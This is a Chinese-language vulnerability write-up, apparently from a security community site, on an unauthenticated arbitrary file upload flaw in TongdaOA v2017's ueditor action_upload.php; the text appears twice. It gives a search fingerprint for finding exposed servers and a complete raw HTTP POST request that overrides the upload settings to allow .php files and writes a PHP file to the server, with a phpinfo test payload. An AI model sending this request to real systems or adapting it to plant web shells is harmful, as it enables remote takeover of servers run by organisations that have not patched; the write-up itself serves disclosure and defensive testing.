TongdaOA v2017 action_upload.php 任意文件上传漏洞

# TongdaOA v2017 action_upload.php 任意文件上传漏洞 ## 漏洞描述 TongdaOA v2017 action_upload.php 文件过滤不足且无需后台权限，导致任意文件上传漏洞 ## 漏洞影响 TongdaOA v...

TongdaOA v2017 action\_upload.php 任意文件上传漏洞
==========================================

漏洞描述
----

TongdaOA v2017 action\_upload.php 文件过滤不足且无需后台权限，导致任意文件上传漏洞

漏洞影响
----

TongdaOA v2017

网络测绘
----

app="TDXK-TongdaOA"

漏洞复现
----

访问获取版本信息

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f452439d99bcd81bbbfd184caafd59c0eb4e6e958a80f.jpg)

发送请求包上传任意文件

```php
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 893
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip

-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

tcmd
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"

submit
-----------------------------55719851240137822763221368724--
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f618236a47e8e685bb49abd4f86a0c52cbe837b1466b5.jpg)

再访问上传的文件

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f102147103d25ad6b477741bb93793cdab6d1cfb148c0.jpg)

TongdaOA v2017 action_upload.php 任意文件上传漏洞

漏洞描述

TongdaOA v2017 action_upload.php 文件过滤不足且无需后台权限，导致任意文件上传漏洞

漏洞影响

TongdaOA v2017

网络测绘

app="TDXK-TongdaOA"

漏洞复现

访问获取版本信息

发送请求包上传任意文件

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 893
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip

-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

tcmd
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"

submit
-----------------------------55719851240137822763221368724--

再访问上传的文件

发表于 2024-07-12 18:44:35
阅读 ( 2365 )
分类：OA产品

站长统计